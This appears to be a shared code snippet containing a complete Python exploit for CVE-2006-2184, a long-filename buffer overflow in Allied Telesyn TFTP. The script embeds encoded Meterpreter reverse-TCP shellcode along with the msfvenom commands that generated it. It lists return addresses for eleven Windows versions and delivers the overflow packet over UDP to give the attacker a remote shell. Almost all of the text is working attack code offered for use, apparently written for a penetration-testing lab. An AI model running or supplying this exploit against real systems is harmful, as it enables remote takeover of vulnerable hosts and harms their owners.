AfroThundr3007730
11/8/2017 - 9:34 PM

Modified version of CVE-2006-2184 python script found here: https://github.com/Re4son/AT-TFTP_Long_Filename/blob/master/attftp_long_filename

Modified version of CVE-2006-2184 python script found here: https://github.com/Re4son/AT-TFTP_Long_Filename/blob/master/attftp_long_filename.py

#!/usr/bin/env python

import sys
import struct
import socket as so

print '#######################################################################'
print '#  CVE-2006-2184 - Allied Telesyn TFTP v1.9 Long Filename Overflow    #'
print '#  This is a modified version of Re4son\'s code                        #'
print '#    (https://github.com/Re4son/AT-TFTP_Long_Filename)                #'
print '#  The return addresses are ported from metasploit module             #'
print '#    exploit/windows/tftp/attftp_long_filename                        #'
print '#######################################################################\n'

# Shellcode - Staged Meterpreter Reverse TCP (NONX)
# Badchars: \x00
# StackAdjustment: -3500
# Payload size: 210 bytes
# Generation instructions:
# printf '\x81\xec\xac\x0d\x00\x00' > payload # sub exp, 0xdac / nop / nop
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.95 LPORT=443 \
#     -a x86 --platform Windows -e generic/none -f raw >> payload
# cat payload | msfvenom -p - -e x86/shikata_ga_nai -b "\x00" -f c
SHELLCODE = (
    "\xdb\xd6\xd9\x74\x24\xf4\xbe\xcf\xa5\x10\xfb\x5f\x29\xc9\xb1\x2e"
    "\x83\xc7\x04\x31\x77\x16\x03\x77\x16\xe2\x3a\x24\xfc\x57\xc9\x27"
    "\xfd\x5b\xbb\xcc\xba\x4b\xc2\xec\xba\x73\x54\x22\x9e\x07\xe9\x78"
    "\xab\x64\x2c\xf9\xaa\x7b\xc5\xae\x8c\x82\x33\xdb\xf9\x1e\xc2\x32"
    "\x30\xdf\x5d\x66\xf2\x15\x50\x76\x37\x2d\xaa\x0d\x41\x6d\x4c\xd7"
    "\x67\x07\x73\x6c\xf3\xa7\x57\x72\xea\x5e\x1c\x68\xb5\x15\x6d\x8d"
    "\x44\xc3\x72\x81\xdf\x9a\x18\xfd\xc3\xfd\x1f\x1d\xca\x26\xbb\x55"
    "\x6e\xe9\xc8\x2a\x7d\x82\xbe\xb6\xd0\x1f\x56\xcf\x74\x46\xf5\xa9"
    "\xe0\xb5\xcb\x5d\x86\xca\x19\xc1\x3c\x4b\xe4\x8f\xdc\x6c\xc0\xe5"
    "\x4e\xc0\xbf\x56\x32\xb5\x7c\x0a\x3d\xde\xe4\x2d\xd2\x29\xea\x7a"
    "\x7e\x4c\x53\x63\x5f\x6f\x75\x0a\xd9\x38\x16\x2c\xcf\xae\x80\xd8"
    "\xfb\xd0\x0f\xbb\x93\xd1\x14\x25\x37\x5b\x89\xc0\xa7\x08\x1a\x73"
    "\x71\xf9\xa1\x84\x57\x56\x1d\x76\x08\x04\x0a\xd4\xce\x13\x74\xe2"
    "\xf1\x82"
)


def set_return(target):
    if target == '1':
        print '[+] Selecting target: Windows NT SP4 English'
        retaddr = struct.pack('<L', 0x702ea6f7)
    elif target == '2':
        print '[+] Selecting target: Windows 2000 SP0 English'
        retaddr = struct.pack('<L', 0x750362c3)
    elif target == '3':
        print '[+] Selecting target: Windows 2000 SP1 English'
        retaddr = struct.pack('<L', 0x75031d85)
    elif target == '4':
        print '[+] Selecting target: Windows 2000 SP2 English'
        retaddr = struct.pack('<L', 0x7503431b)
    elif target == '5':
        print '[+] Selecting target: Windows 2000 SP3 English'
        retaddr = struct.pack('<L', 0x74fe1c5a)
    elif target == '6':
        print '[+] Selecting target: Windows 2000 SP4 English'
        retaddr = struct.pack('<L', 0x75031dce)
    elif target == '7':
        print '[+] Selecting target: Windows XP SP0/1 English'
        retaddr = struct.pack('<L', 0x71ab7bfb)
    elif target == '8':
        print '[+] Selecting target: Windows XP SP2 English'
        retaddr = struct.pack('<L', 0x71ab9372)
    elif target == '9':
        print '[+] Selecting target: Windows XP SP3 English'
        retaddr = struct.pack('<L', 0x7e429353) # ret by c0re
    elif target == '10':
        print '[+] Selecting target: Windows Server 2003'
        retaddr = struct.pack('<L', 0x7c86fed3) # ret donated by securityxxxpert
    elif target == '11':
        print '[+] Selecting target: Windows Server 2003 SP2'
        retaddr = struct.pack('<L', 0x7c86a01b) # ret donated by Polar Bear
    else:
        print '[-] Target not supported or invalid target specified!'
        sys.exit(-1)
    return retaddr


def build_payload(shellcode, retaddr, lhost):
    # Let's build the payload
    print '[+] Constructing payload.'
    # Create NOP sled to brin NOPs & LHOST to 25 bytes
    nops = "\x90" * (25 - len(lhost))
    tail = ""                           # tail from metasploit
    tail += "\x83\xc4\x28\xc3"          # add esp, 0x28 / ret
    tail += "\x00netascii\x00"          # Finish as expected by the AT TFTP server
    payload = "\x00\x02" + nops + shellcode + retaddr + tail
    return payload


def send_packet(payload, rhost, rport):
    # Declare a UDP socket
    s = so.socket(so.AF_INET, so.SOCK_DGRAM)
    print "[+] Delivering package..."
    try:
        s.sendto(payload, (rhost, rport))
    except OSError:
        print "[-] Could not connect to " + rhost + ":" + str(rport) + "!"
        sys.exit(-1)
    print "[+] Package delivered!"


def main():
    try:
        RHOST = sys.argv[1]                 # Target IP address as command line argument
        RPORT = int(sys.argv[2])            # Target Port as command line argument
        LHOST = sys.argv[3]                 # Attackers IP address
        TARGET = sys.argv[4] if len(sys.argv) > 4 else '10'    # The target system
    except IndexError:
        print '[-] Usage: %s <RHOST> <RPORT> <LHOST> [<TARGET>]' % sys.argv[0]
        print '[-] Example: %s 10.11.1.226 69 10.11.0.95' % sys.argv[0]
        print '[-]'
        print '[-] Available Targets (* = Default):'
        print '[-]     1 - Windows NT SP4 English'
        print '[-]     2 - Windows 2000 SP0 English'
        print '[-]     3 - Windows 2000 SP1 English'
        print '[-]     4 - Windows 2000 SP2 English'
        print '[-]     5 - Windows 2000 SP3 English'
        print '[-]     6 - Windows 2000 SP4 English'
        print '[-]     7 - Windows XP SP0/1 English'
        print '[-]     8 - Windows XP SP2 English'
        print '[-]     9 - Windows XP SP3 English'
        print '[-]  * 10 - Windows Server 2003'
        print '[-]    11 - Windows Server 2003 SP2'
        sys.exit(-1)

    RETADDR = set_return(TARGET)
    PAYLOAD = build_payload(SHELLCODE, RETADDR, LHOST)
    send_packet(PAYLOAD, RHOST, RPORT)


if __name__ == '__main__':
    main()